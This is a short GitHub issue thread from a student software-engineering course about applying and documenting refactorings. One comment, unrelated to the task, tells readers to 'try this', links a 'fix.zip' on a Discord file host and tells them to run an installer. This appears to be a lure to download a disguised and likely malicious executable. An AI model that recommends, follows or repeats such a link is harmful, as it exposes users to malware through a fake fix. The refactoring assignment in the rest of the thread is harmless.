### ISSUE TITLE
Aplicar tres refactorizaciones diferentes y documentarlas. (I) 5 Horas

### ISSUE THREAD

**Issue by AlbertOneWay** [Ing-Software-III/hexo-master-fork#10]

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by AlbertOneWay** [comment]
Implementar una refactorizacion (diferentes a rename, replace magic literal y remove dead code) y documentar el antes y después con evidencias en "Análisis de calidad".
